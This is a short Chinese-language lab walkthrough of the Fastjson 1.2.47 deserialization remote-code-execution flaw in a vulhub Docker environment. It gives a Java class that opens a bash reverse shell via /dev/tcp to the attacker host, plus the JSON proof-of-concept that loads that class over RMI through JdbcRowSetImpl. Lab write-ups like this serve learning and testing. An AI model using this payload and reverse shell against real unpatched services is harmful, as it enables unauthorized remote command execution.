一、启动环境

虚拟机:kali靶机:192.168.125.130/172.19.0.1(docker地址:172.19.0.2)

虚拟机:kali攻击机:192.168.125.130/172.19.0.1

本地MAC:172.XX.XX.XX

启动 fastjson 反序列化导致任意命令执行漏洞 环境

1.进入 vulhub 的 Fastjson 1.2.47 路径

cd /../../vulhub/fastjson/1.2.47-rce

2.编译并启动环境

docker-compose up -d

3.查看环境运行状态

docker ps | grep rce

二、漏洞利用

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"bash", "-c","bash -i >& /dev/tcp/192.168.125.130/4444 0>&1 &"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

将java文件编译成class文件

开启http服务

开启rmi服务

发送poc

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://192.168.125.130:9998/TouchFile","autoCommit":true}
}

反弹成功